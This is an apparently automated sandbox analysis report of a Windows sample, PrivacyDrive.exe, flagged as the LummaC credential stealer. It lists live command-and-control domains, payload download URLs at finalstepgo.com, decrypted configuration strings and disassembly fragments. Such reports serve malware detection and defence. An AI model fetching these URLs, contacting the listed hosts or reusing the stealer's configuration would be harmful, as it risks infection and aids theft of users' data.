Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00414200 GetLocalTime,

4_2_00414200

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00476750 LookupAccountNameW,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,

4_2_00476750

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004A83C0 _memset,_memset,GetVersionExW,

4_2_004A83C0

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.12.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040D05C RpcBindingFree,LeaveCriticalSection,	4_2_0040D05C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040D0B0 WaitForSingleObject,WaitForSingleObject,EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,CloseHandle,	4_2_0040D0B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040CDF0 EnterCriticalSection,RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,RpcEpResolveBinding,RpcStringFreeW,RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,	4_2_0040CDF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040CEEC RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,	4_2_0040CEEC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040CF40 EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,	4_2_0040CF40

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.255.122.133	finalstepgo.com	Netherlands		42237	ICMESE	true
172.67.206.221	racedsuitreow.shop	United States		13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
racedsuitreow.shop	172.67.206.221	true
finalstepgo.com	185.255.122.133	true
candleduseiwo.shop	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://finalstepgo.com/uploads/il222.zip	false	Avira URL Cloud: malware	unknown
covvercilverow.shop	true	Avira URL Cloud: malware	unknown
pumpkinkwquo.shop	true	Avira URL Cloud: malware	unknown
abortinoiwiam.shop	true	Avira URL Cloud: malware	unknown
deallyharvenw.shop	true	Avira URL Cloud: malware	unknown
defenddsouneuw.shop	true	Avira URL Cloud: malware	unknown
priooozekw.shop	true	Avira URL Cloud: malware	unknown
https://racedsuitreow.shop/api	true	Avira URL Cloud: malware	unknown
surroundeocw.shop	true	Avira URL Cloud: malware	unknown
racedsuitreow.shop	true	Avira URL Cloud: malware	unknown
candleduseiwo.shop	true	Avira URL Cloud: malware	unknown
https://finalstepgo.com/uploads/il2.txt	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://racedsuitreow.shop/P	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/	Avira URL Cloud: Label: malware
Source: covvercilverow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiJV&	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiU.h	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zip	Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop	Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop	Avira URL Cloud: Label: malware
Source: deallyharvenw.shop	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zipK	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com:443/uploads/il222.zip	Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiV	Avira URL Cloud: Label: malware
Source: priooozekw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/)e3	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/a	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apisP	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/3	Avira URL Cloud: Label: malware
Source: surroundeocw.shop	Avira URL Cloud: Label: malware
Source: racedsuitreow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop:443/api	Avira URL Cloud: Label: malware
Source: candleduseiwo.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apie	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il2.txt	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com:443/uploads/il222.zipe	Avira URL Cloud: Label: malware

Found malware configuration

Source: PrivacyDrive.exe.764.8.memstrmin

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: covvercilverow.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: surroundeocw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: abortinoiwiam.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: pumpkinkwquo.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: priooozekw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: deallyharvenw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: defenddsouneuw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: racedsuitreow.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: candleduseiwo.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: yJEcaG--rui1222

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0052D130 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,

4_2_0052D130

Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00477BE0 FindFirstFileW,		4_2_00477BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00495D80 FindFirstFileW,FindClose,		4_2_00495D80

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F96013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F9600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	4_2_00F911B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_00FAD0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_00FA2132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_00FAD134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FC12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	4_2_00FC12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FCC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00FBC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	4_2_00FC5272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	4_2_00FC63F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F9539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_00FA8312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	4_2_00F974E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	4_2_00F8F4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	4_2_00FB54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	4_2_00FC0432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_00FA2403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_00FA25AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00FA8582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FAF577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_00F9F6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	4_2_00F866B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FAA692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00FCB612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_00FB076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_00FB076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	4_2_00F87712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	4_2_00F958A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	4_2_00F9F835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FC9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	4_2_00FC9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F959AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	4_2_00F959AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	4_2_00F9C952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_00F92911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	4_2_00F97AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	4_2_00F97BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_00FCBBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	4_2_00F88B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	4_2_00FC0B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	4_2_00FC2B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	4_2_00F94DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_00FB1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_00FA9DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	4_2_00FA5D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_00FCBD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	4_2_00FC0EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_00FB3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	4_2_00FCBED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	4_2_00FAFEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FC4E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_00FB0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FCBFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_00FB3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_00FB3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	4_2_051AF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_051EA1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_051D2531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_051D24B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051EA5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_051D3419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_051CF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_051D342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051E3420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_051D24D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	4_2_051EA4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	4_2_051CE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	4_2_051DF4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_051CB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_051C0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_051CB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	4_2_051E1100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_051D314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	4_2_051A7170
